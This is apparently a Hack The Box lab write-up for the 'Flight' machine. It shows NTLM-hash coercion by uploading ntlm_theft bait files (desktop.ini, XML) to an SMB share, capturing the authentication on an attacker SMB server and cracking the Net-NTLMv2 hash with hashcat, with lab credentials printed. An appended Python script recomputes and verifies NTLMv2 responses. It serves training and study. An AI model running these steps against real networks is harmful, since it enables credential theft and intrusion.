NTLM Theft


NTLM theft is a common technique used by adversaries to abuse Windows' built-in network authentication, which is triggered whenever a remote resource is accessed. The technique is sometimes called an NTLM leak, as it consists of methods that coerce a target Windows host into performing network authentication and thereby revealing its credential hashes (Net-NTLM responses), which can then be used for offline password cracking or NTLM relay.

One of these methods was used earlier to leak the Net-NTLMv2 hash of the svc_apache account, which was cracked at a later stage.

The current assessment revealed that the s.moon user has limited write access to the \\g0.flight.htb\Shared share.

  • The observed restriction is that only files with .ini and .xml extensions are allowed for upload.
  • The \\g0.flight.htb\Shared share appears to be actively used: its contents get wiped, either by a scheduled task or by users, as the name of the share suggests.

In the following sections, I will attempt to coerce the target system into a network authentication by leveraging Windows system configuration files.

Windows System Configuration Files


Windows uses various files and file extensions for system functionality, customization, or optimization purposes; they provide instructions or metadata related to the folder (directory) or drive they are associated with. Some of these files are specific to certain functionalities or features of the operating system. Some examples are:

  • desktop.ini:
    • Purpose: Customizes the appearance and behavior of a folder.
    • Execution: When Windows Explorer encounters a desktop.ini file within a folder, it reads the contents of the file and applies the specified configurations for that specific folder.
  • autorun.inf:
    • Purpose: Specifies autorun settings for CDs, DVDs, USB drives, etc.
    • Execution: When a drive is accessed, Windows checks for the presence of an autorun.inf file. If found, it may automatically run a program or open a document based on the instructions in the file.
  • Thumbs.db, iconcache.db, thumbcache_*.db:
    • Purpose: Stores thumbnail cache information to speed up the display of thumbnails.
    • Execution: These files are automatically generated and managed by the operating system. Windows uses the cached information to quickly display thumbnails for folders.
  • folder.htt:
    • Purpose: Defines HTML templates for customizing the appearance of folders in Windows.
    • Execution: When viewing a folder with customized settings, Windows uses the instructions in the folder.htt file to render the folder’s appearance.
  • custom.dic:
    • Purpose: Stores custom words added by the user to the Windows spell checker dictionary.
    • Execution: The content is used by the spell checker to recognize and include user-added words in the dictionary.

There is a tool, ntlm_theft (https://github.com/Greenwolf/ntlm_theft), that automates the generation process.

ntlm_theft


ntlm_theft is primarily aimed at Penetration Testers and Red Teamers, who will use it to perform internal phishing on target company employees, or to mass test antivirus and email gateways. It may also be used for external phishing if outbound SMB access is allowed on the perimeter firewall.

┌──(kali㉿kali)-[~/…/htb/labs/flight/ntlm_theft]
└─$ python3 ntlm_theft.py -g all -s 10.10.16.8 -f stealer
created: stealer/stealer.scf (BROWSE TO FOLDER)
created: stealer/stealer-(url).url (BROWSE TO FOLDER)
created: stealer/stealer-(icon).url (BROWSE TO FOLDER)
created: stealer/stealer.lnk (BROWSE TO FOLDER)
created: stealer/stealer.rtf (OPEN)
created: stealer/stealer-(stylesheet).xml (OPEN)
created: stealer/stealer-(fulldocx).xml (OPEN)
created: stealer/stealer.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
created: stealer/stealer-(includepicture).docx (OPEN)
created: stealer/stealer-(remotetemplate).docx (OPEN)
created: stealer/stealer-(frameset).docx (OPEN)
created: stealer/stealer-(externalcell).xlsx (OPEN)
created: stealer/stealer.wax (OPEN)
created: stealer/stealer.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
created: stealer/stealer.asx (OPEN)
created: stealer/stealer.jnlp (OPEN)
created: stealer/stealer.application (DOWNLOAD AND OPEN)
created: stealer/stealer.pdf (OPEN AND ALLOW)
created: stealer/zoom-attack-instructions.txt (PASTE TO CHAT)
created: stealer/Autorun.inf (BROWSE TO FOLDER)
created: stealer/desktop.ini (BROWSE TO FOLDER)
Generation Complete.

I generated every stealer type with -g all in order to test the upload whitelist; the file-name prefix stealer is given with -f.

┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ simplesmb . -smb2support  
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Config file parsed
[*] callback added for uuid 4b324fc8-1670-01d3-1278-5a47bf6ee188 v:3.0
[*] callback added for uuid 6bffd098-a112-3610-9833-46c3f87e345a v:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

I have Kali running a simple (Impacket) SMB server to receive the inbound NTLM authentication.

┌──(kali㉿kali)-[~/…/htb/labs/flight/ntlm_theft]
└─$ cd stealer ; smbclient //g0.flight.htb/Shared -U 'flight.htb\s.moon%S@Ss!K@*t13' -c 'prompt false ; mput *'
NT_STATUS_ACCESS_DENIED opening remote file \stealer.lnk
putting file stealer.application as \stealer.application (3.5 kb/s) (average 3.5 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \stealer.wax
NT_STATUS_ACCESS_DENIED opening remote file \stealer-(externalcell).xlsx
putting file stealer.jnlp as \stealer.jnlp (0.3 kb/s) (average 1.8 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \stealer-(icon).url
NT_STATUS_ACCESS_DENIED opening remote file \stealer-(remotetemplate).docx
NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf
NT_STATUS_ACCESS_DENIED opening remote file \stealer.scf
putting file desktop.ini as \desktop.ini (0.2 kb/s) (average 1.4 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \stealer-(url).url
NT_STATUS_ACCESS_DENIED opening remote file \stealer.asx
NT_STATUS_ACCESS_DENIED opening remote file \stealer.pdf
NT_STATUS_ACCESS_DENIED opening remote file \stealer-(includepicture).docx
putting file stealer-(fulldocx).xml as \stealer-(fulldocx).xml (78.2 kb/s) (average 33.3 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt
NT_STATUS_ACCESS_DENIED opening remote file \stealer.htm
NT_STATUS_ACCESS_DENIED opening remote file \stealer.rtf
putting file stealer-(stylesheet).xml as \stealer-(stylesheet).xml (0.4 kb/s) (average 28.5 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \stealer.m3u
NT_STATUS_ACCESS_DENIED opening remote file \stealer-(frameset).docx
 
# ls
drw-rw-rw-          0  tue dec 12 01:50:10 2023 .
drw-rw-rw-          0  tue dec 12 01:50:10 2023 ..
-rw-rw-rw-         46  tue dec 12 01:50:08 2023 desktop.ini
-rw-rw-rw-      72584  tue dec 12 01:50:09 2023 stealer-(fulldocx).xml
-rw-rw-rw-        162  tue dec 12 01:50:11 2023 stealer-(stylesheet).xml
-rw-rw-rw-       1649  tue dec 12 01:50:06 2023 stealer.application
-rw-rw-rw-        191  tue dec 12 01:50:07 2023 stealer.jnlp

Only files with the following extensions were accepted for upload:

  • .application
  • .jnlp
  • .ini
  • .xml

A moment later, the Kali SMB server received a network authentication from the c.bum user. c.bum is a valid domain user, and the captured hash string appears to be another Net-NTLMv2 hash.

I will attempt to crack it with hashcat

Password Cracking


┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ hashcat -a 0 -m 5600 c.bum.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
 
C.BUM::flight.htb:aaaaaaaaaaaaaaaa:ce9c05bad0ba15ebd2347c51c86b304c:0101000000000000807cf4b2942cda01ea9ad3a12b4497d40000000001001000710073004c0047007500490048004b0003001000710073004c0047007500490048004b0002001000750075006d006800430072007700620004001000750075006d006800430072007700620007000800807cf4b2942cda0106000400020000000800300030000000000000000000000000300000f377ff619a9971b9151148f0afd73f23298106c88f89e83fb08af98d19b03ad30a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0038000000000000000000:Tikkycoll_431012284
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: C.BUM::flight.htb:aaaaaaaaaaaaaaaa:ce9c05bad0ba15eb...000000
Time.Started.....: Tue Dec 12 01:49:03 2023 (4 secs)
Time.Estimated...: Tue Dec 12 01:49:07 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2262.0 kH/s (0.78ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10536960/14344386 (73.46%)
Rejected.........: 0/10536960 (0.00%)
Restore.Point....: 10533888/14344386 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: ToNmAi -> TiffanyD
Hardware.Mon.#1..: Util: 59%
 
Stopped: Tue Dec 12 01:49:09 2023

hashcat cracked the hash: the password for the c.bum user is Tikkycoll_431012284. The credential still needs to be validated.
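As an added example (not part of the original writeup), the following Python script takes the Net-NTLMv2 line captured above, splits it into the fields hashcat mode 5600 expects, decodes the AV pairs inside the client blob, and recomputes the NTProofStr for a candidate password, which is the single check hashcat performs for every guess. The hash line is the one captured on this page; the helper names, the pure-Python MD4, and the constructed self-check values (user j.doe, domain lab.local, password Winter2023!, the 10.0.0.5 target) are this example's own assumptions.

```python
"""Dissect a Net-NTLMv2 line in hashcat 5600 format and recompute its NTProofStr for a
candidate password (the per-guess check hashcat performs). Added example: the hash line is
the one captured on the page; helper names and the constructed self-check data are assumed."""
import hashlib
import hmac
import struct
from datetime import datetime, timedelta, timezone

M32 = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); needed because hashlib's md4 is often disabled under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & M32
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a, b, c, d = d, rotl((a + F(b, c, d) + X[i]) & M32, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + G(b, c, d) + X[k] + 0x5A827999) & M32, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            a, b, c, d = d, rotl((a + H(b, c, d) + X[r3[i]] + 0x6ED9EBA1) & M32, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)

AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
            5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 8: "SingleHost", 9: "TargetName",
            10: "ChannelBindings"}

def parse_5600(line: str) -> dict:
    """Split USER::DOMAIN:SERVERCHALLENGE:NTPROOFSTR:BLOB[:PASSWORD]; decode the blob (MS-NLMP 2.2.2.7)."""
    user, _, domain, chal, proof, blob_hex = line.strip().split(":")[:6]
    blob = bytes.fromhex(blob_hex)
    filetime = struct.unpack("<Q", blob[8:16])[0]  # 100 ns ticks since 1601-01-01 UTC (client clock)
    info = {"user": user, "domain": domain, "server_challenge": chal, "nt_proof": proof,
            "blob": blob, "client_challenge": blob[16:24].hex(), "av_pairs": {},
            "timestamp": datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)}
    pos = 28  # header(8) + timestamp(8) + client challenge(8) + reserved(4)
    while True:
        av_id, av_len = struct.unpack("<HH", blob[pos:pos + 4])
        value = blob[pos + 4:pos + 4 + av_len]
        pos += 4 + av_len
        if av_id == 0:  # MsvAvEOL terminates the list
            return info
        name = AV_NAMES.get(av_id, f"AvId{av_id}")
        info["av_pairs"][name] = value.decode("utf-16-le") if av_id in (1, 2, 3, 4, 5, 9) else value.hex()

def ntlmv2_proof(password: str, user: str, domain: str, server_chal: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob); NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) || domain)."""
    nt_hash = md4(password.encode("utf-16-le"))
    ntowf_v2 = hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(ntowf_v2, server_chal + blob, hashlib.md5).digest()

def verify_candidate(line: str, password: str) -> bool:
    """True if `password` reproduces the captured NTProofStr; every input is in the line, hence fully offline."""
    h = parse_5600(line)
    proof = ntlmv2_proof(password, h["user"], h["domain"], bytes.fromhex(h["server_challenge"]), h["blob"])
    return hmac.compare_digest(proof, bytes.fromhex(h["nt_proof"]))

def _av(av_id: int, value: bytes) -> bytes:
    return struct.pack("<HH", av_id, len(value)) + value

def build_line(user: str, domain: str, password: str, server_chal: bytes, blob: bytes) -> str:
    # Constructed 5600-format line for a known password, used only for the self-check.
    proof = ntlmv2_proof(password, user, domain, server_chal, blob)
    return f"{user}::{domain}:{server_chal.hex()}:{proof.hex()}:{blob.hex()}"

# Constructed minimal blob: header, zero timestamp, fixed client challenge, two AV pairs, EOL.
CONSTRUCTED_BLOB = (bytes.fromhex("0101000000000000") + bytes(8) + bytes.fromhex("1122334455667788")
                    + bytes(4) + _av(2, "LAB".encode("utf-16-le"))
                    + _av(9, "cifs/10.0.0.5".encode("utf-16-le")) + _av(0, b""))

# The Net-NTLMv2 response captured on the page (c.bum), blob split per field for readability.
PAGE_BLOB = ("0101000000000000" "807cf4b2942cda01" "ea9ad3a12b4497d4" "00000000"  # hdr, time, client chal, rsvd
             "01001000" "710073004c0047007500490048004b00"   # MsvAvNbComputerName
             "03001000" "710073004c0047007500490048004b00"   # MsvAvDnsComputerName
             "02001000" "750075006d0068004300720077006200"   # MsvAvNbDomainName
             "04001000" "750075006d0068004300720077006200"   # MsvAvDnsDomainName
             "07000800" "807cf4b2942cda01" "06000400" "02000000"  # MsvAvTimestamp, MsvAvFlags
             "08003000" "30000000000000000000000000300000"   # MsvAvSingleHost (48 bytes)
             "f377ff619a9971b9151148f0afd73f23298106c88f89e83fb08af98d19b03ad3"
             "0a001000" "00000000000000000000000000000000"   # MsvAvChannelBindings
             "09001e00" "63006900660073002f00310030002e00310030002e00310036002e003800"  # MsvAvTargetName
             "00000000" "00000000")                          # MsvAvEOL + trailing padding
PAGE_HASH = "C.BUM::flight.htb:aaaaaaaaaaaaaaaa:ce9c05bad0ba15ebd2347c51c86b304c:" + PAGE_BLOB
CRACKED = "Tikkycoll_431012284"  # password recovered by hashcat on the page

if __name__ == "__main__":
    h = parse_5600(PAGE_HASH)
    print(f"{h['user']}@{h['domain']} -> {h['av_pairs']['TargetName']} at {h['timestamp']:%Y-%m-%d %H:%M:%S} UTC")
    print("Cracked password reproduces NTProofStr:", verify_candidate(PAGE_HASH, CRACKED))
```

The decoded AV pairs are the part of such a capture a defender or incident responder cares about: MsvAvTargetName records the SPN the client was authenticating to (here cifs/10.10.16.8, the listening Kali host), the timestamp pins down when the coerced authentication happened (client clock, UTC), and the randomised NetBIOS/DNS names are the ones the listener presented rather than a real domain controller. The verify step also makes clear why cracking is offline: the server challenge, the client blob and the NTProofStr are all in the captured line, so each guess costs one MD4 and two HMAC-MD5s and nothing is sent to the domain.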